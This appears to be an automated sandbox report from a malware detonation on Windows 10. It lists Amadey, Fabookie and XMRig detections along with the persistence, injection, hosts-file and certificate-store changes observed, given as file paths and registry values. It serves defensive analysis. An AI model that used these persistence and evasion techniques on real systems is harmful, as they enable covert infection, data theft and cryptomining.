2023-10-04 22:03

Platform

win10v2004-20230915-en

Max time kernel

133s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5nEFLhvur3PfnWFfqazVcbhe.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dGIPEz9n7OVcihVvNtfHAic4.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kO1KRPG4oOONnPKyWWQ2An2Q.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pVTXkOiHKAHqCqYAnM2rV6H6.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kr27Ey1NE3Y5Notxl7fEKGsO.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TZSRnhFzitYjo4TnClmGKisZ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onywQULHStPc8A2RYT8Y8uYa.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0uoHVTc55FxRhaUsghlx8u5i.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C6PPl873Avd8oxJhqrrnG8Bj.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XnjZeeJD8ofcRSwPBBC26dmy.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m2P2rA2RW0F7IB2YG1D51LnQ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe N/A
N/A N/A C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe N/A
N/A N/A C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe N/A
N/A N/A C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe N/A
N/A N/A C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
N/A N/A C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe N/A
N/A N/A C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
N/A N/A C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp N/A
N/A N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
N/A N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
N/A N/A C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\s6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000042051\\s6.exe" C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Civutisudi.exe\"" C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4516 set thread context of 1640 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 4616 set thread context of 6044 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 4616 set thread context of 6080 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\VTRegScan.dll C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-K12OK.tmp C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File opened for modification C:\Program Files (x86)\LightCleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\Mozilla Maintenance Service\Civutisudi.exe C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A
File opened for modification C:\Program Files (x86)\LightCleaner\LightCleaner.exe C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File opened for modification C:\Program Files (x86)\LightCleaner\CircularProgressBar.dll C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-GAF4Q.tmp C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe N/A
File created C:\Program Files (x86)\Mozilla Maintenance Service\Civutisudi.exe.config C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-QQE4Q.tmp C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files (x86)\LightCleaner\is-AGPK8.tmp C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A
File created C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe.config C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe N/A
File created C:\Program Files (x86)\LightCleaner\is-DRIA0.tmp C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 